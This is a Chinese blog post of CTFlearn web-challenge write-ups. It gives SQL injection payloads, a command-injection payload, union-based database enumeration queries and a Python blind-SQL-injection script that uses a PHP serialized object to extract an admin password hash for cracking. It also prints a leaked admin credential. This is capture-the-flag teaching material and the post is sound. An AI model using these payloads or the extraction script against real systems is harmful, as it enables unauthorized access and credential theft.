CTFlearn.writeup(web)

最新推荐文章于 2022-10-01 21:48:28 发布
最新推荐文章于 2022-10-01 21:48:28 发布
阅读量1.2k 收藏
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_38094687/article/details/80113097
版权

CTFlean writeups(web)

CTFlearn平台

Basic Injection

payload: 1' or 1#

basic

POST practice

右键源码:

<!-- username: admin | password: 71urlkufpsdnlkadsf -->

post提交即可

Don’t Bump Your Head(er)

按照要求改user-agent 和 referer即可:

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.6,en-US;q=0.4,en;q=0.2
Cache-Control: no-cache
Connection: keep-alive
Host: ctflearn.com
Pragma: no-cache
referer: awesomesauce.com
Upgrade-Insecure-Requests: 1
User-Agent: Sup3rS3cr3tAg3nt

Calculat3 M3

页面是个计算器,js代码中有

c(eval(document.getElementById("d").value))

命令执行.会post一个参数expression
不过只能ls,其他都被过滤了,连ls -a也不行

payload:expression=;ls

Inj3ction Time

  1. 1 and 1=0#1 and 1=1#结果不一样
  2. 1 order by 4# 4个字段

  3. 0 union select 1,2,table_name,4 from information_schema.tables where table_schema=database()--+table

  4. 0 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--+table

  5. 0 union select 1,2,group_concat(f0und_m3),4 from w0w_y0u_f0und_m3--+ 得到flag

测试了一下 mysql.innodb_index_stats发现不行.
本地测试的时候可以看出这个表是用来记录数据变动的
根据这篇博客的说法:从5.6.x版本开始添加了mysql.innodb_index_stats & mysql.innodb_table_stats
而记录时间是InnoDB Persistent Statistics Tables

Grid It!

压轴题出现(sql注入+序列化),应该是本平台除了变态的js混淆外最难也最有价值的题了
http://web.ctflearn.com/grid/index.php
注册个账户进入主页,大概的功能就是通过x,y加点,加完点后delete_point很可疑
http://web.ctflearn.com/grid/controller.php?action=delete_point&point=O:5:"point":3:{s:1:"x";s:1:"1";s:1:"y";s:1:"1";s:2:"ID";s:6:"542304";}

大概的思路就是添加一个点进去,看一下用payload能不能删除,删除成功即id不存在,说明payload语句为true.二分法爆破的方法是从书神那里学来的,确实快不少.这里写脚本:

import requests
import re
import sys
p = re.compile(r'''ID: (.+?)&nbspx:''')
ans = ''
for pos in range(1,33):
    l = 0
    r = 127
    headers = {"Cookie": "PHPSESSID=8rmq4bgp0uhraog0kvqbcnj6u0"}
    data = {"x": "1", "y": "1"}
    while l<r:
        mid = int((l+r)/2)
        requests.post(
            "http://web.ctflearn.com/grid/controller.php?action=add_point", data=data, headers=headers)
        resp = requests.get("http://web.ctflearn.com/grid/", headers=headers).text
        _id = p.search(resp).group(1)
        payload = _id +  ' and ord(mid((select password from user where username="admin" limit 0, 1), ' +  str(pos) + ',1))>' + str(mid)
        length = len(payload)
        resp = requests.get('''http://web.ctflearn.com/grid/controller.php?action=delete_point&point=O:5:"point":3:{s:1:"x";s:1:"1";s:1:"y";s:1:"1";s:2:"ID";s:'''+str(length)+''':"%s";}'''%payload,headers=headers,allow_redirects=False).text
        resp = requests.get("http://web.ctflearn.com/grid/",headers=headers).text
        if _id not in resp:
            l = mid+1
        else:
            r = mid
    if l==0:
        break
    ans = ans + chr(l)
    print(ans)
    sys.stdout.flush()
    #point,user
    #username,password,uid
    #admin,test,,time,b,yeraisci,bro,bajilak,tes{},1234,tes
    #0c2c99a4ad05d39177c30b30531b119b

先替换自己的cookie再操作
password
最后跑出字段,数值,将admin的password的md5值在SOD解密一下,然后以管理员的身份进入即可得到flag

黑羽re
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFlearn 网站的Writeup (easy 1)
dchua123的专栏
03-22 1345
123
CTFLearn Web-AudioEdit
No Title
02-05 1104
CTFLearn Web-AudioEdit 打开网站是一个上传mp3的网站,第一反应是文件上传漏洞类型的题目,于是编写简单的php文件,修改其后缀名,上传报错提示无效的文件类型。尝试用burp修改其content-type为audio/mp3,依然提示无效。 于是上传正常mp3文件,几次尝试后发现,网页不是根据文件后缀名或是content-type判断文件是否有效,而是会判断文件结构是否符合。 ...
二维码_(一)生成与拼接
08-05
参考资料编写的小DEMO,各路大神不喜勿喷
Writeup.rar
12-01
Writeup.rar
CTF杂项之总结(二)
weixin_47793142的博客
06-06 3868
题1 打开压缩包,是一个PNG图片。图片内容是二维码。 微信扫码转入一个网页: 看起来是一个搜索引擎搜索“key不在这里”得到的页面。 实际上,扫码得到的是一个链接,手机识别后会自动访问。所以将链接单独提取出来: https://cn.bing.com/search?q=key%E4%B8%8D%E5%9C%A8%E8%BF%99%E9%87%8C&m=1021089710337556653100525310297505354515550505052102525655525499541029856
程序员的数学课16 二分法:如何利用指数爆炸优化程序?
fegus的博客
10-01 982
正式讲课之前,我先问你这样一个问题,请你尽可能快速回答。一张 1 毫米厚度的纸,对折几次后,可以达到地球到月球的距离(39 万公里)?我在写这篇稿子的时候,问了身边的几个朋友。最小的回答是 1 万次,最大的则是 100 万次。请问在你的直觉下,你的答案又是多少呢?我猜想无论如何都是上万次吧,毕竟我们离月球有 39 万公里呢。折纸的过程就是 1 变 2,2 变 4,4 变 8,这样一个翻一倍的过程。聪明的你,会发现其实这就是一个关于指数函数和对数函数的问题。那么,这与我们的编程有什么关系吗?
CTFLearn Web-Grid It
No Title
02-06 667
CTFLearn Web-Grid It 打开网页有两个页面:登录和注册,首先尝试注册一个admin用户,无果,猜测系统已有一个admin用户;尝试下用户名注入,无果。于是先注册一个普通账号,登录进去看看进一步的功能。 登录后主要可进行以下几个操作: 添加point 删除point 添加point时为POST: https://web.ctflearn.com/grid/controller....
CTFlearn-Writeups:CTF学习我解决的所有挑战的文章。 它涵盖了所有领域,包括密码学,取证,反向,伪造和其他杂项问题
05-18
CTF学习文章 CTF学习我解决的所有挑战的文章。 它涵盖了所有领域,包括密码学,取证,反向,伪造和其他杂项问题。 链接到CTF: :
CTFlearn 网站的Writeup (easy 2,持续更新中心)
dchua123的专栏
03-24 935
国内的大部分CTF练习平台都是收费的,搜来搜去找到了一个国外的提供免费练习的网站https://ctflearn.com/,于是尝试开始做题。下面是记录。 1、HEXTROADINARY 异或操作即可,flag为0xc0ded 2、Wikipedia 按理要去百科上去搜,结果你懂的。 3、Simple Programming 编程题,统计一行中1是3的倍数,或者0是2的倍数的行数。...
2016 SWPU CTF web1题目源码
10-31
2016 SWPU CTF web1题目源码
实验吧writeup Web方向
08-27
就是实验吧的一些writeup,,因缺思厅的绕过,让我进去,上传绕过, dvwa,简单的sql注入3
GKCTF2021-官方WriteUp.pdf
07-06
GKCTF2021-官方WriteUp.pdf
[SECT2019] —writeup撰写.docx
11-28
writeup CTF
广东第一届网络安全知识竞赛比赛CTF题做题记录
cadandme的博客
05-23 1949
今天进行的CTF比赛,跟队友一起做出了几道CTF题,挑几道签到题记录一下,主要记录一下自己参加比赛的点滴,讲解不全,请见谅。 第一题:小猪佩奇,看的我眼花 用stegsolve打开查看,眼神好的立马就可以发现背景有二维码碎片,一共有25张图,25张碎片需要拼接。大佬们都是脚本跑出来的,但小白的我只能苦哈哈的抠图。在队友的帮忙下,漫长的扣图后产品如下: 扫出来后是密文,base解码两次后为猪圈密码,小猪佩奇也是一个提示吧。 第二题 :misc签到题 流量分析,给了一个流量包, 在kali中文件分离后在一个压
CTF-练习平台部分writeup
热门推荐
hijack89的博客
04-03 4万+
CTF-练习平台writeupCTF-练习平台MISC滴答~滴看标题基本就知道是摩尔斯密码“.”、”-“,直接在线摩尔斯解密 聪明的小羊小羊。。。老套路 翻栅栏,栅栏密码。。。比较简单,直接看出来是两栏加密 KEY{sad23jjdsa2}这是一张单纯的图片??看题目估计是道隐写术的题,先保存图片的说; 30分的题,估计不会太难,直接文本编辑器打开;文本末尾发现了一行转义序列: 看来这
一天一道ctf 第47天(二分法盲注)
scrawman的博客
07-29 288
[BSidesCF 2019]Kookie 看样子是要我们以admin登录,线索是cookie。只要抓包添加cookie:username=admin就行了(???) [WUSTCTF2020]颜值成绩查询
CTF考核writeup(1)
一段旅途
11-23 4190
在sql注入、文件上传和文件包含问题上,可以学到一些新思路。
CTF命令执行及绕过技巧
JBlock的博客
03-07 2万+
前言 今天是代码审计部分的一个技巧补充!前些阵子做了sql注入回顾篇系列!今天开启php代码审计系列! 今天内容主要是CTF中命令注入及绕过的一些技巧!以及构成RCE的一些情景! 文章目录前言正文代码执行代码执行的几种方式命令执行常见命令执行函数绕过姿势敏感字符绕过处理无回显的命令执行Think one Think 正文 在详细介绍命令注入之前,有一点需要注意:命令注入与远程代码执行不同。他们的区...
iscc2015官方writeup
最新发布
09-06
iscc2015是国际信号与通信会议(International Symposium on Communication and Information Technologies)的官方writeup,在这个writeup中,主要回顾了iscc2015会议的主要内容和成果。 iscc2015会议是由IEEE...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值